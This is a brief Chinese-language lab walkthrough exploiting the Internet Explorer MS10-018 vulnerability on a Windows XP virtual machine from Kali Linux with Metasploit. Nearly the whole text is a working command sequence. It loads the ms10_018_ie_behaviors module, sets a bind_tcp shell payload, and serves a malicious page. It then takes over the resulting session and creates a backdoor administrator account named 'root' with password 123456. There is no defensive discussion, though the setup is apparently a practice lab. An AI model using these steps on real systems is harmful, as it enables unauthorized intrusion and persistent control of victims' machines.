漏洞详情:https://technet.microsoft.com/library/security/ms10-018
一准备:
1:kali Linux系统 192.168.195.129
2:Windows XP系统 192.168.195.130
二:Kali Linux系统操作
1::msfconsole 启动metsploits
2:search ms10_018 搜索ms10_018
3:use exploit/windows/browser/ms10_018_ie_behaviors 启动ms10_018模块
1:set PAYLOAD windows/shell/bind_tcp 选定并设置攻击载荷
2:show options 查看所需参数
1:set SRVHOST 192.168.195.129(Kali的IP)
2:set URIPATH ms10_018.html
3:show options
1:exploit 尝试攻击
1:sessions
2:setg LHOST 192.168.195.129
3:sessions -u 1
1:sessions -i 1 与ID为1的控制会话进行交互
2:ipconfig 查看windows系统IP
3:net user root 123456 /add 添加root用户
4:net localgroup Administrator root /add 提升root用户权限至Administrator用户组
参考:http://www.computersecuritystudent.com/SECURITY_TOOLS/Metasploit/lesson11/